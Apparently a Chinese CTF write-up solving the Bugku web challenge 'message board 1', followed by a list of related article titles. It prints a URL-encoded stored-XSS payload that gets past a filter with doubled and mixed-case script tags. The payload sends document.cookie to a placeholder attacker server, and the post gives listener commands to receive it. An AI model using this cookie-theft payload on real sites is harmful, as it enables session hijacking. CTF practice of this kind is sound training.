当前位置: 首页 > news >正文

Bugku-CTF-web-留言板1

因为最近这道题解了好久,即网上和题目下方留言区都有wp链接和payload,但就是做不出,好痒啊~~后来通过虚心请教某师傅,终于得到解题方法,加上网上也没找到几篇像样的wp,所以就打算发一篇(其实是因为这题花了我好多金币,有点难受了)
题目截图
在这里插入图片描述
在【留言板】的基础上进行了双写+大写绕过,payload(抓包替换exp就行)
content=%E8%AF%B4%E7%82%B9%E4%BB%80%E4%B9%88%E5%90%A7%3CscsCRiPtript%3Elocation.href%3D%22%2F%2F127.0.0.1%2F%22%2Bdocument.cookie%3C%2FscsCRiPtript%3E
注意事项:
1、需要干净的题目容器
2、好像有长度限制
3、发包前检查payload标签是否闭合
4、bp打码部分是服务器IP,对应payload127.0.0.1,复制到记事本加上自己的公网服务器IP编辑好payload,抓包替换就行
在这里插入图片描述
这题是【留言板】的变种,虽然还存在/admin.php页面,但不需要登录(其实是因为登不上),直接XSS就好
公网服务器接收到的flag(之前看到一些师傅wp里用flask、XSS平台接收cookie,所以就光顾着纠结、烦恼flask、XSS平台没有接收到cookie,根本没想到nv -lvv 80 或者python3 -m http.server 80也能接收到flag…)
python3 -m http.server 80
在这里插入图片描述
如果我的方法还是不乘的话,可以看看下面几个WP(之前就是跟这些做的,但做不出…)
https://blog.csdn.net/weixin_74357882/article/details/149303799?sharetype=blogdetail&sharerId=149303799&sharerefer=PC&sharesource=weixin_74357882&spm=1011.2480.3001.8118

https://zhuanlan.zhihu.com/p/839767477

https://surpsec.blog.csdn.net/article/details/136151656

http://www.dtcms.com/a/327393.html

相关文章:

  • Linux网络--2.2、TCP接口
  • PMBT2907A,215 Nxp安世半导体 双极性晶体管 开关电源管理芯片
  • 蚁剑--安装、使用
  • C# 基于halcon的视觉工作流-章29-边缘提取-亚像素
  • 力扣.870优势洗牌解决方法: 下标排序​编辑力扣.942增减字符串匹配最长回文子序列牛客.背包问题(最大体积)力扣.45跳跃游戏II 另一种思考
  • 数据结构——线性表(核心操作,附代码)
  • vue项目封装axios请求,支持判断当前环境及判断token是否过期等等(详细教程,可复制粘贴代码)
  • cuda排序算法--双调排序(Bitonic_Sort)
  • 【数据库】 MySQL 表的操作详解
  • 蓝桥杯手算题和杂题简易做法
  • 《Auracast广播音频技术解析及未来路线图》 —蓝牙技术联盟 市场拓展经理 吴志豪 技术与市场经理 鲁公羽
  • 基于 DiT 大模型与字体级分割的视频字幕无痕擦除方案,助力短剧出海
  • 深度学习与遥感入门(六)|轻量化 MobileNetV2 高光谱分类
  • 4.7 GB 视频导致浏览器内存溢出(OOM)的解决方案
  • 从零部署Nacos:替代Eureka的服务注册与服务发现基础教程
  • 视频输入输出模块介绍和示例
  • Dubbo 3.x源码(33)—Dubbo Consumer接收服务调用响应
  • Python day42
  • tensorrt-llm0.20.0离线部署DeepSeek-R1-Distill-Qwen-32B
  • 第六十三章:AI模型的“跨界之旅”:不同硬件架构下的兼容性方案
  • Linux NAPI 实现机制深度解析
  • 【CDA 新一级】学习笔记第1篇:数据分析的时代背景
  • 【前端八股文面试题】【JavaScript篇7】什么是JavaScript的原型、原型链? 有什么特点
  • 【设计模式精解】Java实现责任链模式(职责链模式)优雅处理多级请求(概述,使用场景,优缺点,代码示例)
  • Rust:构造函数 new() 如何进行错误处理?
  • 信号(Signal)** 是一种进程间异步通信机制,用于通知进程发生发生了某种事件(如错误、用户中断等)
  • 疯狂星期四文案网第37天运营日记
  • Apache POI中通过WorkBook写入图片后出现导出PDF文件时在不同页重复写入该图片问题,如何在通过sheet获取绘图对象清除该图片
  • 通过限制对象的内存分配位置来实现特定的设计目标
  • 【数据结构入门】堆